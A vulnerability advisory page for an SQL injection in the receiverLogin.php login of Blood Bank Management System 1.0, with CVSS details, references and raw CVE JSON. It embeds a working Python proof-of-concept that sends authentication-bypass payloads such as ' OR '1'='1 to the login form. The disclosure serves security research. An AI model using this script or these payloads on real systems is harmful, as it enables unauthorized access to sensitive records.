Security Vulnerability Report
CVE-2025-63531 CVSS 10.0 CRITICAL

CVE-2025-63531

Published: 2025-12-01 15:15:52
Last Modified: 2025-12-02 03:03:25

Description

A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the receiverLogin.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the remail and rpassword fields, an attacker can bypass authentication and gain unauthorized access to the system.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Blood Bank Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-63531 SQL Injection PoC
# Target: Blood Bank Management System 1.0 - receiverLogin.php
# Author: Security Researcher


def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in Blood Bank Management System
    """
    target = target_url.rstrip('/') + '/receiverLogin.php'

    # SQL injection payload for authentication bypass
    data = {
        'remail': payload,
        'rpassword': 'anypassword'
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    try:
        response = requests.post(target, data=data, headers=headers, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')
        return None


def main():
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-63531.py <target_url>')
        print('Example: python cve-2025-63531.py http://vulnerable-site.com')
        sys.exit(1)

    target_url = sys.argv[1]

    # Basic authentication bypass payloads
    payloads = [
        "' OR '1'='1",
        "admin' OR '1'='1'--",
        "' OR 1=1--",
        "' UNION SELECT NULL--",
        "' OR 'x'='x"
    ]

    print(f'[*] Targeting: {target_url}')
    print('[*] Exploiting CVE-2025-63531 SQL Injection...')

    for payload in payloads:
        print(f'[*] Testing payload: {payload}')
        response = exploit_sqli(target_url, payload)

        if response and response.status_code == 200:
            # Check for successful login indicators
            if 'dashboard' in response.text.lower() or 'welcome' in response.text.lower():
                print(f'[+] Successful exploitation with payload: {payload}')
                print('[+] Authentication bypassed!')
                return

    print('[-] Exploitation failed or target not vulnerable')


if __name__ == '__main__':
    main()
```

References

https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing (Exploit, Third Party Advisory)
https://github.com/Shridharshukl/Blood-Bank-Management-System (Product)
https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63531.md (Exploit)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63531",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-01T15:15:51.987",
    "lastModified": "2025-12-02T03:03:24.593",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the receiverLogin.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the remail and rpassword fields, an attacker can bypass authentication and gain unauthorized access to the system."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-89"}]
      },
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-89"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/Shridharshukl/Blood-Bank-Management-System",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63531.md",
        "source": "[email protected]",
        "tags": ["Exploit"]
      }
    ]
  }
}
```